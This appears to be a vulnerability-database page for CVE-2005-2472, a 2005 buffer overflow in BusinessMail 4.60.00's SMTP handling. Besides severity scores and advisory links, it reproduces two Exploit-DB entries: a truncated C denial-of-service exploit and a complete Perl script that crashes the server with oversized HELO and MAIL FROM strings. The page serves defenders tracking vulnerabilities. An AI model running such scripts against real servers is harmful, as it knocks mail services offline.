CVE-2005-2472
published 2005-08-05CVE-2005-2472: Multiple buffer overflows in BusinessMail 4.60.00 allow remote attackers to cause a denial of service (application crash) via a long string to SMTP (1) HELO or…
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
4.58%
90.5th percentile
Multiple buffer overflows in BusinessMail 4.60.00 allow remote attackers to cause a denial of service (application crash) via a long string to SMTP (1) HELO or (2) MAIL FROM commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netcplus | businessmail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BusinessMail Server 4.60.00 - Remote Denial of Service
exploitdb·2005-08-01
CVE-2005-2472 BusinessMail Server 4.60.00 - Remote Denial of Service
BusinessMail Server 4.60.00 - Remote Denial of Service
---
/*****************************************************************
BusinessMail Server Remote Denial of Service Exploit by Kozan
( Based on Reed Arvin's code in perl )
Application: BusinessMail Server 4.60.00
Vendor: www.netcplus.com
Discovered by: Reed Arvin
Exploit Coded by: Kozan
Credits to ATmaCA, Reed Arvin
Web: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
Exploit-DB
BusinessMail Server 4.60.00 - Remote Buffer Overflow
exploitdb·2005-07-30
CVE-2005-2472 BusinessMail Server 4.60.00 - Remote Buffer Overflow
BusinessMail Server 4.60.00 - Remote Buffer Overflow
---
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl
# BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";
sleep(1);
print $socket "HELO " . "A" x 512 . "\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====
# milw0rm.com [2005-07-30]
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035647.htmlhttp://marc.info/?l=bugtraq&m=112291456305261&w=2http://reedarvin.thearvins.com/20050730-01.htmlhttp://secunia.com/advisories/16306http://securitytracker.com/id?1014602http://www.osvdb.org/18407http://www.securityfocus.com/bid/14434https://exchange.xforce.ibmcloud.com/vulnerabilities/21636http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035647.htmlhttp://marc.info/?l=bugtraq&m=112291456305261&w=2http://reedarvin.thearvins.com/20050730-01.htmlhttp://secunia.com/advisories/16306http://securitytracker.com/id?1014602http://www.osvdb.org/18407http://www.securityfocus.com/bid/14434https://exchange.xforce.ibmcloud.com/vulnerabilities/21636
2005-08-05
Published